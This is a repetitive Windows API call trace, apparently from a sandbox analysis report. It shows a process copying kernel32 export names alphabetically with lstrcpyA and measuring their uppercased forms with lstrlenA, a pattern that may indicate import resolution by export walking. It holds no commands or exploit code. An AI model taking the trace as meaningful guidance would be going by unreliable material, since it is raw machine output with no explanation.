lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.201] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.201] lstrlenA (lpString="ADDATOMA") returned 8 [0084.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.201] lstrlenA (lpString="ADDATOMW") returned 8 [0084.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.201] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.201] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.201] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.202] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.202] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.202] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.202] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.202] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.202] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.202] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.202] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.202] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.202] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.202] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.202] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.202] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.202] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.202] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.202] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.202] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.202] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.202] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.203] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.203] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.203] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.203] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.203] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.203] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.203] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.203] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.203] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.203] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.203] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.203] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.203] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.203] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.203] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.203] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.203] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.203] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.203] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.204] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.204] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.204] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.204] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.204] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.204] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.204] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.204] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.204] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.204] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.204] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.204] lstrlenA (lpString="BEEP") returned 4 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.204] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.204] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.204] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.204] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.204] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.204] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.204] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.205] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.205] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.205] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.205] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.205] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.205] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.205] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.205] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.205] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.205] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.205] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.205] lstrlenA (lpString="CANCELIO") returned 8 [0084.205] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.205] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.205] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.205] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.206] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.206] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.206] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.206] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.206] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.206] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.206] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.206] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.206] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.206] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.206] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.206] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.206] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.206] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.206] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.206] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.206] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.206] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.206] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.207] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.207] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.207] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.207] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.207] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.207] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.207] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.207] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.207] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.207] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.207] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.207] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.207] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.207] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.207] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.207] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.207] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.207] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.207] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.208] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.208] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.208] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.208] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.208] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.208] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.208] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.208] lstrlenA (lpString="COPYFILEA") returned 9 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.208] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.208] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.208] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.208] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.208] lstrlenA (lpString="COPYFILEW") returned 9 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.208] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.208] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.208] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.208] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.208] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.208] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.209] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.209] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.209] lstrlenA 